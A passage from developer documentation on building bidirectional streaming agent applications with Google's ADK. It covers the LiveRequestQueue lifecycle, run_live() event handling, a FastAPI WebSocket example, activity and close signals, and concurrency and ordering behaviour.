The close signal persists in the queue (see [`live_request_queue.py:59-60`](https://github.com/google/adk-python/blob/fd2c0f556b786417a9f6add744827b07e7a06b7d/src/google/adk/agents/live_request_queue.py#L66-L67)) and terminates the sender loop (see [`base_llm_flow.py:264-266`](https://github.com/google/adk-python/blob/fd2c0f556b786417a9f6add744827b07e7a06b7d/src/google/adk/flows/llm_flows/base_llm_flow.py#L260-L262)). Reusing a queue would carry over this signal and any remaining messages from the previous session. ### Phase 3: Bidi-streaming with `run_live()` event loop Once the streaming loop is running, you can send messages to the agent and receive responses **concurrently**—this is Bidi-streaming in action. The agent can be generating a response while you're sending new input, enabling natural interruption-based conversation. #### Send Messages to the Agent Use `LiveRequestQueue` methods to send different types of messages to the agent during the streaming session: Demo implementation: [main.py:169-217](https://github.com/google/adk-samples/blob/31847c0723fbf16ddf6eed411eb070d1c76afd1a/python/agents/bidi-demo/app/main.py#L169-L217) ```python from google.genai import types # Send text content content = types.Content(parts=[types.Part(text=json_message["text"])]) live_request_queue.send_content(content) # Send audio blob audio_blob = types.Blob( mime_type="audio/pcm;rate=16000", data=audio_data ) live_request_queue.send_realtime(audio_blob) ``` These methods are **non-blocking**—they immediately add messages to the queue without waiting for processing. This enables smooth, responsive user experiences even during heavy AI processing. See [Part 2: Sending messages with LiveRequestQueue](https://google.github.io/adk-docs/streaming/dev-guide/part2/index.md) for detailed API documentation. #### Receive and Process Events The `run_live()` async generator continuously yields `Event` objects as the agent processes input and generates responses. 
Each event represents a discrete occurrence: partial text generation, audio chunks, tool execution, transcription, interruption, or turn completion.

Demo implementation: [main.py:219-234](https://github.com/google/adk-samples/blob/31847c0723fbf16ddf6eed411eb070d1c76afd1a/python/agents/bidi-demo/app/main.py#L219-L234)

```python
async for event in runner.run_live(
    user_id=user_id,
    session_id=session_id,
    live_request_queue=live_request_queue,
    run_config=run_config
):
    # Serialize each event to JSON and forward it to the client
    event_json = event.model_dump_json(exclude_none=True, by_alias=True)
    await websocket.send_text(event_json)
```

Events are designed for **streaming delivery**: you receive partial responses as they're generated, not just complete messages. This enables real-time UI updates and responsive user experiences.

See [Part 3: Event handling with run_live()](https://google.github.io/adk-docs/streaming/dev-guide/part3/index.md) for comprehensive event handling patterns.

### Phase 4: Terminate Live API session

When the streaming session should end (the user disconnects, the conversation completes, or a timeout occurs), close the queue to signal that the Live API session should terminate.

#### Close the Queue

Send a close signal through the queue to terminate the streaming loop:

Demo implementation: [main.py:253](https://github.com/google/adk-samples/blob/31847c0723fbf16ddf6eed411eb070d1c76afd1a/python/agents/bidi-demo/app/main.py#L253)

```python
live_request_queue.close()
```

This signals `run_live()` to stop yielding events and exit the async generator loop. The agent completes any in-progress processing and the streaming session ends cleanly.

### FastAPI Application Example

Here's a complete FastAPI WebSocket application showing all four phases integrated with proper Bidi-streaming. The key pattern is **upstream/downstream tasks**: the upstream task receives messages from the WebSocket and sends them to `LiveRequestQueue`, while the downstream task receives `Event` objects from `run_live()` and sends them to the WebSocket.

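The upstream/downstream pattern does not depend on FastAPI or ADK, so it can be tried in isolation. The following is a minimal standard-library sketch, not ADK code: an `asyncio.Queue` with a hypothetical `CLOSE` sentinel stands in for `LiveRequestQueue` and its close signal, `fake_run_live()` is an illustrative stand-in for `run_live()`, and plain lists stand in for the WebSocket.

```python
import asyncio

# Hypothetical sentinel standing in for the queue's close signal.
CLOSE = object()


async def upstream(incoming: list[str], queue: asyncio.Queue) -> None:
    """Forward client messages to the queue, then signal close."""
    for message in incoming:
        queue.put_nowait(message)  # non-blocking enqueue
        await asyncio.sleep(0)     # yield so the downstream side can run
    queue.put_nowait(CLOSE)        # the client "disconnected"


async def fake_run_live(queue: asyncio.Queue):
    """Toy async generator: yields one event per message until close."""
    while True:
        item = await queue.get()
        if item is CLOSE:
            return
        yield f"event: {item}"


async def downstream(queue: asyncio.Queue, sent: list[str]) -> None:
    """Forward each event to the client (here, a list)."""
    async for event in fake_run_live(queue):
        sent.append(event)


async def handle_connection(incoming: list[str]) -> list[str]:
    """Run both directions concurrently for one simulated connection."""
    queue: asyncio.Queue = asyncio.Queue()  # one fresh queue per session
    sent: list[str] = []
    await asyncio.gather(upstream(incoming, queue), downstream(queue, sent))
    return sent


if __name__ == "__main__":
    print(asyncio.run(handle_connection(["hello", "world"])))
```

Both coroutines make progress concurrently under `asyncio.gather()`, and the downstream loop ends only once the close sentinel arrives. In this toy model, omitting the sentinel would leave `downstream()` waiting forever, which mirrors why a streaming application must always close its queue.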
**Complete Demo Implementation**: For the production-ready implementation with multimodal support (text, audio, image), see the complete [`main.py`](https://github.com/google/adk-samples/blob/31847c0723fbf16ddf6eed411eb070d1c76afd1a/python/agents/bidi-demo/app/main.py) file.

**Complete Implementation:**

```python
import asyncio

from fastapi import FastAPI, WebSocket, WebSocketDisconnect
from google.adk.runners import Runner
from google.adk.agents.run_config import RunConfig, StreamingMode
from google.adk.agents.live_request_queue import LiveRequestQueue
from google.adk.sessions import InMemorySessionService
from google.genai import types

from google_search_agent.agent import agent

# ========================================
# Phase 1: Application Initialization (once at startup)
# ========================================

APP_NAME = "bidi-demo"

app = FastAPI()

# Define your session service
session_service = InMemorySessionService()

# Define your runner
runner = Runner(
    app_name=APP_NAME,
    agent=agent,
    session_service=session_service
)

# ========================================
# WebSocket Endpoint
# ========================================

@app.websocket("/ws/{user_id}/{session_id}")
async def websocket_endpoint(websocket: WebSocket, user_id: str, session_id: str) -> None:
    await websocket.accept()

    # ========================================
    # Phase 2: Session Initialization (once per streaming session)
    # ========================================

    # Create RunConfig
    response_modalities = ["AUDIO"]
    run_config = RunConfig(
        streaming_mode=StreamingMode.BIDI,
        response_modalities=response_modalities,
        input_audio_transcription=types.AudioTranscriptionConfig(),
        output_audio_transcription=types.AudioTranscriptionConfig(),
        session_resumption=types.SessionResumptionConfig()
    )

    # Get or create session
    session = await session_service.get_session(
        app_name=APP_NAME,
        user_id=user_id,
        session_id=session_id
    )
    if not session:
        await session_service.create_session(
            app_name=APP_NAME,
            user_id=user_id,
            session_id=session_id
        )

    # Create LiveRequestQueue
    live_request_queue = LiveRequestQueue()

    # ========================================
    # Phase 3: Active Session (concurrent bidirectional communication)
    # ========================================

    async def upstream_task() -> None:
        """Receives messages from WebSocket and sends to LiveRequestQueue."""
        try:
            while True:
                # Receive text message from WebSocket
                data: str = await websocket.receive_text()

                # Send to LiveRequestQueue
                content = types.Content(parts=[types.Part(text=data)])
                live_request_queue.send_content(content)
        except WebSocketDisconnect:
            # Client disconnected: signal the queue to close so that
            # run_live() exits and the downstream task can finish
            live_request_queue.close()

    async def downstream_task() -> None:
        """Receives Events from run_live() and sends to WebSocket."""
        async for event in runner.run_live(
            user_id=user_id,
            session_id=session_id,
            live_request_queue=live_request_queue,
            run_config=run_config
        ):
            # Send event as JSON to WebSocket
            await websocket.send_text(
                event.model_dump_json(exclude_none=True, by_alias=True)
            )

    # Run both tasks concurrently
    try:
        await asyncio.gather(
            upstream_task(),
            downstream_task(),
            return_exceptions=True
        )
    finally:
        # ========================================
        # Phase 4: Session Termination
        # ========================================

        # Always close the queue, even if exceptions occurred
        live_request_queue.close()
```

**Async Context Required**: All ADK bidirectional streaming applications **must run in an async context**.
This requirement comes from multiple components:

- **`run_live()`**: ADK's streaming method is an async generator with no synchronous wrapper (unlike `run()`)
- **Session operations**: `get_session()` and `create_session()` are async methods
- **WebSocket operations**: FastAPI's `websocket.accept()`, `receive_text()`, and `send_text()` are all async
- **Concurrent tasks**: The upstream/downstream pattern requires `asyncio.gather()` for concurrent execution

All code examples in this guide assume you're running in an async context (e.g., within an async function or coroutine). For consistency with ADK's official documentation patterns, examples show the core logic without boilerplate wrapper functions.

### Key Concepts

**Upstream Task (WebSocket → LiveRequestQueue)**

The upstream task continuously receives messages from the WebSocket client and forwards them to the `LiveRequestQueue`. This enables the user to send messages to the agent at any time, even while the agent is generating a response.

Demo implementation: [main.py:169-217](https://github.com/google/adk-samples/blob/31847c0723fbf16ddf6eed411eb070d1c76afd1a/python/agents/bidi-demo/app/main.py#L169-L217)

```python
async def upstream_task() -> None:
    """Receives messages from WebSocket and sends to LiveRequestQueue."""
    try:
        while True:
            data: str = await websocket.receive_text()
            content = types.Content(parts=[types.Part(text=data)])
            live_request_queue.send_content(content)
    except WebSocketDisconnect:
        # Client disconnected: close the queue so run_live() can exit
        live_request_queue.close()
```

**Downstream Task (run_live() → WebSocket)**

The downstream task continuously receives `Event` objects from `run_live()` and sends them to the WebSocket client. This streams the agent's responses, tool executions, transcriptions, and other events to the user in real time.

Demo implementation: [main.py:219-234](https://github.com/google/adk-samples/blob/31847c0723fbf16ddf6eed411eb070d1c76afd1a/python/agents/bidi-demo/app/main.py#L219-L234) ```python async def downstream_task() -> None: """Receives Events from run_live() and sends to WebSocket.""" async for event in runner.run_live( user_id=user_id, session_id=session_id, live_request_queue=live_request_queue, run_config=run_config ): await websocket.send_text( event.model_dump_json(exclude_none=True, by_alias=True) ) ``` **Concurrent Execution with Cleanup** Both tasks run concurrently using `asyncio.gather()`, enabling true Bidi-streaming. The `try/finally` block ensures `LiveRequestQueue.close()` is called even if exceptions occur, minimizing the session resource usage. Demo implementation: [main.py:238-253](https://github.com/google/adk-samples/blob/31847c0723fbf16ddf6eed411eb070d1c76afd1a/python/agents/bidi-demo/app/main.py#L238-L253) ```python try: await asyncio.gather( upstream_task(), downstream_task(), return_exceptions=True ) finally: live_request_queue.close() # Always cleanup ``` This pattern—concurrent upstream/downstream tasks with guaranteed cleanup—is the foundation of production-ready streaming applications. The lifecycle pattern (initialize once, stream many times) enables efficient resource usage and clean separation of concerns, with application components remaining stateless and reusable while session-specific state is isolated in `LiveRequestQueue`, `RunConfig`, and session records. #### Production Considerations This example shows the core pattern. For production applications, consider: - **Error handling (ADK)**: Add proper error handling for ADK streaming events. For details on error event handling, see [Part 3: Error Events](https://google.github.io/adk-docs/streaming/dev-guide/part3/#error-events). 
- Handle task cancellation gracefully by catching `asyncio.CancelledError` during shutdown - Check exceptions from `asyncio.gather()` with `return_exceptions=True` - exceptions don't propagate automatically - **Error handling (Web)**: Handle web application-specific errors in upstream/downstream tasks. For example, with FastAPI you would need to: - Catch `WebSocketDisconnect` (client disconnected), `ConnectionClosedError` (connection lost), and `RuntimeError` (sending to closed connection) - Validate WebSocket connection state before sending with `websocket.client_state` to prevent errors when the connection is closed - **Authentication and authorization**: Implement authentication and authorization for your endpoints - **Rate limiting and quotas**: Add rate limiting and timeout controls. For guidance on concurrent sessions and quota management, see [Part 4: Concurrent Live API Sessions and Quota Management](https://google.github.io/adk-docs/streaming/dev-guide/part4/#concurrent-live-api-sessions-and-quota-management). - **Structured logging**: Use structured logging for debugging. - **Persistent session services**: Consider using persistent session services (`DatabaseSessionService` or `VertexAiSessionService`). See the [ADK Session Services documentation](https://google.github.io/adk-docs/sessions/) for more details. ## 1.6 What We Will Learn This guide takes you through ADK's Bidi-streaming architecture step by step, following the natural flow of streaming applications: how messages travel upstream from users to agents, how events flow downstream from agents to users, how to configure session behaviors, and how to implement multimodal features. 
Each part focuses on a specific component of the streaming architecture with practical patterns you can apply immediately: - **[Part 2: Sending messages with LiveRequestQueue](https://google.github.io/adk-docs/streaming/dev-guide/part2/index.md)** - Learn how ADK's `LiveRequestQueue` provides a unified interface for handling text, audio, and control messages. You'll understand the `LiveRequest` message model, how to send different types of content, manage user activity signals, and handle graceful session termination through a single, elegant API. - **[Part 3: Event handling with run_live()](https://google.github.io/adk-docs/streaming/dev-guide/part3/index.md)** - Master event handling in ADK's streaming architecture. Learn how to process different event types (text, audio, transcriptions, tool calls), manage conversation flow with interruption and turn completion signals, serialize events for network transport, and leverage ADK's automatic tool execution. Understanding event handling is essential for building responsive streaming applications. - **[Part 4: Understanding RunConfig](https://google.github.io/adk-docs/streaming/dev-guide/part4/index.md)** - Configure sophisticated streaming behaviors including multimodal interactions, intelligent proactivity, session resumption, and cost controls. Learn which features are available on different models and how to declaratively control your streaming sessions through RunConfig. - **[Part 5: How to Use Audio, Image and Video](https://google.github.io/adk-docs/streaming/dev-guide/part5/index.md)** - Implement voice and video features with ADK's multimodal capabilities. Understand audio specifications, streaming architectures, voice activity detection, audio transcription, and best practices for building natural voice-enabled AI experiences. 
### Prerequisites and Learning Resources For building an ADK Bidi-streaming application in production, we recommend having basic knowledge of the following technologies: **[ADK (Agent Development Kit)](https://google.github.io/adk-docs/)** Google's production-ready framework for building AI agents with streaming capabilities. ADK provides high-level abstractions for session management, tool orchestration, and state persistence, eliminating the need to implement low-level streaming infrastructure from scratch. **Live API ([Gemini Live API](https://ai.google.dev/gemini-api/docs/live) and [Vertex AI Live API](https://cloud.google.com/vertex-ai/generative-ai/docs/live-api))** Google's real-time conversational AI technology that enables low-latency bidirectional streaming with Gemini models. The Live API provides the underlying WebSocket-based protocol that powers ADK's streaming capabilities, handling multimodal input/output and natural conversation flow. **[Python Async Programming](https://docs.python.org/3/library/asyncio.html)** Python's built-in support for asynchronous programming using `async`/`await` syntax and the `asyncio` library. ADK streaming is built on async generators and coroutines, requiring familiarity with concepts like async functions, awaiting tasks, and concurrent execution with `asyncio.gather()`. **[Pydantic](https://docs.pydantic.dev/)** A Python library for data validation and settings management using Python type annotations. ADK uses Pydantic models extensively for structured data (like `Event`, `RunConfig`, and `Content`), providing type safety, automatic validation, and JSON serialization via `.model_dump_json()`. **[FastAPI](https://fastapi.tiangolo.com/)** A modern, high-performance Python web framework for building APIs with automatic OpenAPI documentation. FastAPI's native support for WebSockets and async request handling makes it ideal for building ADK streaming endpoints. 
FastAPI is included in the `adk-python` package and used by ADK's `adk web` tool for rapid prototyping. Alternative frameworks with WebSocket support (like Flask-SocketIO or Starlette) can also be used. **[WebSockets](https://developer.mozilla.org/en-US/docs/Web/API/WebSockets_API)** A protocol providing full-duplex (two-way) communication channels over a single TCP connection. WebSockets enable real-time bidirectional data flow between clients and servers, making them the standard transport for streaming applications. Unlike HTTP request-response, WebSocket connections persist, allowing both parties to send messages at any time. **[SSE (Server-Sent Events)](https://developer.mozilla.org/en-US/docs/Web/API/Server-sent_events)** A standard for servers to push data to web clients over HTTP. Unlike WebSockets, SSE is unidirectional (server-to-client only), making it simpler but less flexible. SSE is useful for streaming agent responses when you don't need client-to-server streaming, such as when user input comes through separate HTTP POST requests. While this guide covers ADK-specific concepts thoroughly, familiarity with these underlying technologies will help you build more robust production applications. ## Summary In this introduction, you learned how ADK transforms complex real-time streaming infrastructure into a developer-friendly framework. We covered the fundamentals of Live API's bidirectional streaming capabilities, examined how ADK simplifies the streaming complexity through abstractions like `LiveRequestQueue`, `Runner`, and `run_live()`, and explored the complete application lifecycle from initialization through session termination. You now understand how ADK handles the heavy lifting—LLM-side streaming connection management, state persistence, platform differences, and event coordination—so you can focus on building intelligent agent experiences. 
With this foundation in place, you're ready to dive into the specifics of sending messages, handling events, configuring sessions, and implementing multimodal features in the following parts.

______________________________________________________________________

[Next: Part 2: Sending Messages with LiveRequestQueue](https://google.github.io/adk-docs/streaming/dev-guide/part2/index.md) →

# Part 2: Sending messages with LiveRequestQueue

In Part 1, you learned the four-phase lifecycle of ADK Bidi-streaming applications. This part focuses on the upstream flow: how your application sends messages to the agent using `LiveRequestQueue`.

Unlike traditional APIs where different message types require different endpoints or channels, ADK provides a single unified interface through `LiveRequestQueue` and its `LiveRequest` message model.

This part covers:

- **Message types**: Sending text via `send_content()`, streaming audio/image/video via `send_realtime()`, controlling conversation turns with activity signals, and gracefully terminating sessions with control signals
- **Concurrency patterns**: Understanding async queue management and event-loop thread safety
- **Best practices**: Creating queues in async context, ensuring proper resource cleanup, and understanding message ordering guarantees
- **Troubleshooting**: Diagnosing common issues like messages not being processed and queue lifecycle problems

Understanding `LiveRequestQueue` is essential for building responsive streaming applications that handle multimodal inputs seamlessly within async event loops.

## LiveRequestQueue and LiveRequest

The `LiveRequestQueue` is your primary interface for sending messages to the Agent in streaming conversations.
Rather than managing separate channels for text, audio, and control signals, ADK provides a unified `LiveRequest` container that handles all message types through a single, elegant API:

Source reference: [live_request_queue.py](https://github.com/google/adk-python/blob/29c1115959b0084ac1169748863b35323da3cf50/src/google/adk/agents/live_request_queue.py)

```python
class LiveRequest(BaseModel):
    content: Optional[Content] = None  # Text-based content and structured data
    blob: Optional[Blob] = None  # Audio/video data and binary streams
    activity_start: Optional[ActivityStart] = None  # Signal start of user activity
    activity_end: Optional[ActivityEnd] = None  # Signal end of user activity
    close: bool = False  # Graceful connection termination signal
```

This streamlined design handles every streaming scenario you'll encounter. The `content` and `blob` fields handle different data types, the `activity_start` and `activity_end` fields enable activity signaling, and the `close` flag provides graceful termination semantics.

The `content` and `blob` fields are mutually exclusive: only one can be set per `LiveRequest`. While ADK does not enforce this client-side and will attempt to send both if set, the Live API backend will reject this with a validation error. ADK's convenience methods `send_content()` and `send_realtime()` automatically ensure this constraint is met by setting only one field, so **using these methods (rather than manually creating `LiveRequest` objects) is the recommended approach**.

The following diagram illustrates how different message types flow from your application through `LiveRequestQueue` methods, into `LiveRequest` containers, and finally to the Live API:

```
graph LR
    subgraph "Application"
        A1[User Text Input]
        A2[Audio Stream]
        A3[Activity Signals]
        A4[Close Signal]
    end

    subgraph "LiveRequestQueue Methods"
        B1[send_content<br>Content]
        B2[send_realtime<br>Blob]
        B3[send_activity_start<br>ActivityStart]
        B3b[send_activity_end<br>ActivityEnd]
        B4[close<br>close=True]
    end

    subgraph "LiveRequest Container"
        C1[content: Content]
        C2[blob: Blob]
        C3[activity_start/end]
        C4[close: bool]
    end

    subgraph "Gemini Live API"
        D[WebSocket Connection]
    end

    A1 --> B1 --> C1 --> D
    A2 --> B2 --> C2 --> D
    A3 --> B3 --> C3 --> D
    A3 --> B3b --> C3
    A4 --> B4 --> C4 --> D
```

## Sending Different Message Types

`LiveRequestQueue` provides convenient methods for sending different message types to the agent. This section demonstrates practical patterns for text messages, audio/video streaming, activity signals for manual turn control, and session termination.

### send_content(): Sends Text With Turn-by-Turn

The `send_content()` method sends text messages in turn-by-turn mode, where each message represents a discrete conversation turn. This signals a complete turn to the model, triggering immediate response generation.

Demo implementation: [main.py:194-199](https://github.com/google/adk-samples/blob/31847c0723fbf16ddf6eed411eb070d1c76afd1a/python/agents/bidi-demo/app/main.py#L194-L199)

```python
content = types.Content(parts=[types.Part(text=json_message["text"])])
live_request_queue.send_content(content)
```

**Using Content and Part with ADK Bidi-streaming:**

- **`Content`** (`google.genai.types.Content`): A container that represents a single message or turn in the conversation. It holds an array of `Part` objects that together compose the complete message.
- **`Part`** (`google.genai.types.Part`): An individual piece of content within a message. For ADK Bidi-streaming with Live API, you'll use:
  - `text`: Text content (including code) that you send to the model

In practice, most messages use a single text Part for ADK Bidi-streaming.
The multi-part structure is designed for scenarios like:

- Mixing text with function responses (automatically handled by ADK)
- Combining text explanations with structured data
- Future extensibility for new content types

For Live API, multimodal inputs (audio/video) use different mechanisms (see `send_realtime()` below), not multi-part Content.

Content and Part usage in ADK Bidi-streaming

While the Gemini API `Part` type supports many fields (`inline_data`, `file_data`, `function_call`, `function_response`, etc.), most are either handled automatically by ADK or use different mechanisms in Live API:

- **Function calls**: ADK automatically handles the function calling loop: receiving function calls from the model, executing your registered functions, and sending responses back. You don't manually construct these.
- **Images/Video**: Do NOT use `send_content()` with `inline_data`. Instead, use `send_realtime(Blob(mime_type="image/jpeg", data=...))` for continuous streaming. See [Part 5: How to Use Image and Video](https://google.github.io/adk-docs/streaming/dev-guide/part5/#how-to-use-image-and-video).

### send_realtime(): Sends Audio, Image and Video in Real-Time

The `send_realtime()` method sends binary data streams (primarily audio, image, and video) as `Blob` objects, which are transmitted in realtime mode. Unlike text content that gets processed in turn-by-turn mode, blobs are designed for continuous streaming scenarios where data arrives in chunks. You provide raw bytes, and Pydantic automatically handles base64 encoding during JSON serialization for safe network transmission (configured in `LiveRequest.model_config`). The MIME type helps the model understand the content format.
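To make the chunked-streaming idea concrete, here is a minimal standard-library sketch. It assumes 16-bit mono PCM at 16 kHz (the sample rate matches the `audio/pcm;rate=16000` MIME type used in this guide; the sample width and channel count are assumptions), and `iter_pcm_chunks()` is a hypothetical helper, not part of ADK. The `payload` dictionary only illustrates why raw bytes are base64-encoded for JSON; it is not the actual wire format used by ADK or the Live API.

```python
import base64
import json
from typing import Iterator

SAMPLE_RATE_HZ = 16_000   # matches "audio/pcm;rate=16000"
BYTES_PER_SAMPLE = 2      # assumption: 16-bit mono PCM


def iter_pcm_chunks(pcm: bytes, chunk_ms: int = 100) -> Iterator[bytes]:
    """Yield fixed-duration slices of raw PCM (hypothetical helper, not an ADK API)."""
    chunk_bytes = SAMPLE_RATE_HZ * BYTES_PER_SAMPLE * chunk_ms // 1000
    for start in range(0, len(pcm), chunk_bytes):
        yield pcm[start:start + chunk_bytes]


# One second of silence stands in for captured microphone audio.
one_second = bytes(SAMPLE_RATE_HZ * BYTES_PER_SAMPLE)
chunks = list(iter_pcm_chunks(one_second))

# Illustration only: raw bytes are not JSON-serializable, so they are
# base64-encoded before being placed in a JSON document.
payload = json.dumps({
    "mime_type": "audio/pcm;rate=16000",
    "data": base64.b64encode(chunks[0]).decode("ascii"),
})
decoded = base64.b64decode(json.loads(payload)["data"])
```

In an ADK application, each chunk would instead be wrapped in `types.Blob(mime_type="audio/pcm;rate=16000", data=chunk)` and passed to `send_realtime()`, leaving the encoding to Pydantic.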
Demo implementation: [main.py:181-184](https://github.com/google/adk-samples/blob/31847c0723fbf16ddf6eed411eb070d1c76afd1a/python/agents/bidi-demo/app/main.py#L181-L184)

```python
audio_blob = types.Blob(
    mime_type="audio/pcm;rate=16000",
    data=audio_data
)
live_request_queue.send_realtime(audio_blob)
```

Learn More

For complete details on audio, image and video specifications, formats, and best practices, see [Part 5: How to Use Audio, Image and Video](https://google.github.io/adk-docs/streaming/dev-guide/part5/index.md).

### Activity Signals

Activity signals (`ActivityStart`/`ActivityEnd`) can **ONLY** be sent when automatic (server-side) Voice Activity Detection is **explicitly disabled** in your `RunConfig`. Use them when your application requires manual voice activity control, such as:

- **Push-to-talk interfaces**: User explicitly controls when they're speaking (e.g., holding a button)
- **Noisy environments**: Background noise makes automatic VAD unreliable, so you use client-side VAD or manual control
- **Client-side VAD**: You implement your own VAD algorithm on the client to reduce network overhead by only sending audio when speech is detected
- **Custom interaction patterns**: Non-speech scenarios like gesture-triggered interactions or timed audio segments

**What activity signals tell the model:**

- `ActivityStart`: "The user is now speaking - start accumulating audio for processing"
- `ActivityEnd`: "The user has finished speaking - process the accumulated audio and generate a response"

Without these signals (when VAD is disabled), the model doesn't know when to start/stop listening for speech, so you must explicitly mark turn boundaries.
**Sending Activity Signals:**

```python
from google.genai import types

# Manual activity signal pattern (e.g., push-to-talk)
live_request_queue.send_activity_start()  # Signal: user started speaking

# Stream audio chunks while user holds the talk button
while user_is_holding_button:
    audio_blob = types.Blob(mime_type="audio/pcm;rate=16000", data=audio_chunk)
    live_request_queue.send_realtime(audio_blob)

live_request_queue.send_activity_end()  # Signal: user stopped speaking
```

**Default behavior (automatic VAD):** If you don't send activity signals, Live API's built-in VAD automatically detects speech boundaries in the audio stream you send via `send_realtime()`. This is the recommended approach for most applications.

Learn More

For detailed comparison of automatic VAD vs manual activity signals, including when to disable VAD and best practices, see [Part 5: Voice Activity Detection](https://google.github.io/adk-docs/streaming/dev-guide/part5/#voice-activity-detection-vad).

### Control Signals

The `close` signal provides graceful termination semantics for streaming sessions. It signals the system to cleanly close the model connection and end the Bidi-stream. In ADK Bidi-streaming, your application is responsible for sending the `close` signal explicitly:

**Manual closure in BIDI mode:** When using `StreamingMode.BIDI` (Bidi-streaming), your application should manually call `close()` when the session terminates or when errors occur. This practice minimizes session resource usage.

**Automatic closure in SSE mode:** When using the legacy `StreamingMode.SSE` (not Bidi-streaming), ADK automatically calls `close()` on the queue when it receives a `turn_complete=True` event from the model (see [`base_llm_flow.py:781`](https://github.com/google/adk-python/blob/fd2c0f556b786417a9f6add744827b07e7a06b7d/src/google/adk/flows/llm_flows/base_llm_flow.py#L780)).
See [Part 4: Understanding RunConfig](https://google.github.io/adk-docs/streaming/dev-guide/part4/#streamingmode-bidi-or-sse) for a detailed comparison and guidance on when to use each mode.

Demo implementation: [main.py:238-253](https://github.com/google/adk-samples/blob/31847c0723fbf16ddf6eed411eb070d1c76afd1a/python/agents/bidi-demo/app/main.py#L238-L253)

```python
try:
    logger.debug("Starting asyncio.gather for upstream and downstream tasks")
    await asyncio.gather(
        upstream_task(),
        downstream_task()
    )
    logger.debug("asyncio.gather completed normally")
except WebSocketDisconnect:
    logger.debug("Client disconnected normally")
except Exception as e:
    logger.error(f"Unexpected error in streaming tasks: {e}", exc_info=True)
finally:
    # Always close the queue, even if exceptions occurred
    logger.debug("Closing live_request_queue")
    live_request_queue.close()
```

**What happens if you don't call close()?**

Although ADK cleans up local resources automatically, failing to call `close()` in BIDI mode prevents sending a graceful termination signal to the Live API, which will then see an abrupt disconnection only after a certain timeout period. This can lead to "zombie" Live API sessions that remain open on the cloud service, even though your application has finished with them. These stranded sessions may significantly decrease the number of concurrent sessions your application can handle, as they continue to count against your quota limits until they eventually time out.

Learn More

For comprehensive error handling patterns during streaming, including when to use `break` vs `continue` and handling different error types, see [Part 3: Error Events](https://google.github.io/adk-docs/streaming/dev-guide/part3/#error-events).

## Concurrency and Thread Safety

Understanding how `LiveRequestQueue` handles concurrency is essential for building reliable streaming applications.
The queue is built on `asyncio.Queue`, which means it's safe for concurrent access **within the same event loop thread** (the common case), but requires special handling when called from **different threads** (the advanced case). This section explains the design choices behind `LiveRequestQueue`'s API, when you can safely use it without extra precautions, and when you need thread-safety mechanisms like `loop.call_soon_threadsafe()`.

### Async Queue Management

`LiveRequestQueue` uses synchronous methods (`send_content()`, `send_realtime()`) instead of async methods, even though the underlying queue is consumed asynchronously. This design choice uses `asyncio.Queue.put_nowait()`, a non-blocking operation that doesn't require `await`.

**Why synchronous send methods?** Convenience and simplicity. You can call them from anywhere in your async code without `await`:

Demo implementation: [main.py:169-199](https://github.com/google/adk-samples/blob/31847c0723fbf16ddf6eed411eb070d1c76afd1a/python/agents/bidi-demo/app/main.py#L169-L199)

```python
async def upstream_task() -> None:
    """Receives messages from WebSocket and sends to LiveRequestQueue."""
    while True:
        message = await websocket.receive()

        if "bytes" in message:
            audio_data = message["bytes"]
            audio_blob = types.Blob(
                mime_type="audio/pcm;rate=16000",
                data=audio_data
            )
            live_request_queue.send_realtime(audio_blob)

        elif "text" in message:
            text_data = message["text"]
            json_message = json.loads(text_data)

            if json_message.get("type") == "text":
                content = types.Content(parts=[types.Part(text=json_message["text"])])
                live_request_queue.send_content(content)
```

This pattern mixes async I/O operations with sync CPU operations naturally. The send methods return immediately without blocking, allowing your application to stay responsive.
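The design described in this section can be illustrated with a standard-library sketch. `SketchQueue` below is a hypothetical stand-in, not ADK's `LiveRequestQueue`: it only mirrors the idea of synchronous `put_nowait()`-based sends consumed by an async task, and it shows one way a worker thread can hand a message to the loop with `loop.call_soon_threadsafe()`.

```python
import asyncio
import threading


class SketchQueue:
    """Hypothetical stand-in for illustration; not the ADK implementation."""

    def __init__(self) -> None:
        self._queue: asyncio.Queue = asyncio.Queue()

    def send(self, message: str) -> None:
        # Synchronous and non-blocking: fine when called on the event loop thread.
        self._queue.put_nowait(message)

    def close(self) -> None:
        self._queue.put_nowait(None)  # sentinel marking the end of the stream

    async def get(self):
        return await self._queue.get()


async def demo() -> list:
    queue = SketchQueue()  # created inside the running event loop
    loop = asyncio.get_running_loop()
    received = []

    async def consumer() -> None:
        while (message := await queue.get()) is not None:
            received.append(message)

    consumer_task = asyncio.create_task(consumer())

    # Same-thread sends need no await and no locking.
    queue.send("text-1")
    queue.send("audio-chunk-1")

    # A worker thread must not touch the queue directly; it schedules the
    # send on the loop's own thread instead.
    worker = threading.Thread(
        target=lambda: loop.call_soon_threadsafe(queue.send, "from-thread")
    )
    worker.start()
    await asyncio.to_thread(worker.join)  # wait without blocking the loop

    # Yield once more so any callback still pending on the loop gets to run.
    await asyncio.sleep(0)
    queue.close()
    await consumer_task
    return received


received = asyncio.run(demo())
```

The consumer sees the messages in the order they were enqueued, which is the FIFO behavior an `asyncio.Queue` provides.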
#### Best Practice: Create Queue in Async Context

Always create `LiveRequestQueue` within an async context (async function or coroutine) to ensure it uses the correct event loop:

```python
# ✅ Recommended - Create in async context
async def main():
    queue = LiveRequestQueue()  # Uses existing event loop from async context
    # This is the preferred pattern - ensures queue uses the correct event loop
    # that will run your streaming operations

# ❌ Not recommended - Creates event loop automatically
queue = LiveRequestQueue()  # Works but ADK auto-creates new loop
# This works due to ADK's safety mechanism, but may cause issues with
# loop coordination in complex applications or multi-threaded scenarios
```

**Why this matters:** `LiveRequestQueue` requires an event loop to exist when instantiated. ADK includes a safety mechanism that auto-creates a loop if none exists, but relying on this can cause unexpected behavior in multi-threaded scenarios or with custom event loop configurations.

## Message Ordering Guarantees

`LiveRequestQueue` provides predictable message delivery behavior:

| Guarantee | Description | Impact |
| --- | --- | --- |
| **FIFO ordering** | Messages processed in send order (guaranteed by underlying `asyncio.Queue`) | Maintains conversation context and interaction consistency |
| **No coalescing** | Each message delivered independently | No automatic batching: each send operation creates one request |
| **Unbounded by default** | Queue accepts unlimited messages without blocking | **Benefit**: Simplifies client code (no blocking on send)<br>**Risk**: Memory growth if sending faster than processing<br>**Mitigation**: Monitor queue depth in production |

> **Production Tip**: For high-throughput audio/video streaming, monitor `live_request_queue._queue.qsize()` to detect backpressure. If the queue depth grows continuously, slow down your send rate or implement batching. Note: `_queue` is an internal attribute and may change in future releases; use with caution.

## Summary

